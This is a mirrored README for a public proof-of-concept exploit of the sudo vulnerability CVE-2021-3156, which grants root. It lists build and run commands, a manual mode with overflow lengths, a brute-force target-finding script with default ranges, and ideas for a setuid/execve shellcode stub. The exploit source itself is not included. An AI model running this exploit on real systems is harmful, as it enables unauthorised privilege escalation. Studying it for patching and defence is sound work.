CVE 2021 3156 Save

Project README

CVE-2021-3156 PoC

Introduction

This is an exploit for the CVE-2021-3156 sudo vulnerability (dubbed Baron Samedit by Qualys).

Usage

build:

$ make

list targets:

$ ./sudo-hax-me-a-sandwich

run:

$ ./sudo-hax-me-a-sandwich <target_number>

manual mode:

$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

Bruteforce target finding (experimental)

Make sure you have GNU parallel installed.

$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>

some defaults to try:

$ ./brute.sh 90 120 50 70 150 300

Will eat up all available cores. Don't try to netflix & brute.

Contributing

Send (sensible) PR's, I might merge.

Some ideas:

More targets
Target finding
Other exploitation strategies
More self contained functionality:
- Embed shared library hax.c (Make it small please, ELF golf + asm setuid/execve stub)
- Add mkdir logic to hax.c
Directory/shared library cleanup

Open Source Agenda is not affiliated with "CVE 2021 3156" Project. README Source: blasty/CVE-2021-3156

Stars

926

Open Issues

Last Commit

3 years ago

Repository

blasty/CVE-2021-3156

Open Source Agenda Badge

<a href="https://www.opensourceagenda.com/projects/cve-2021-3156"><img src="https://www.opensourceagenda.com/projects/cve-2021-3156/reviews/badge.svg" alt="Open Source Agenda"></a>

Submit Review Review Your Favorite Project

Submit Resource Articles, Courses, Videos

Submit Article Submit a post to our blog

From the blog

Dec 11, 2022

How to Choose Which Programming Language to Learn First?

From the blog

Dec 11, 2022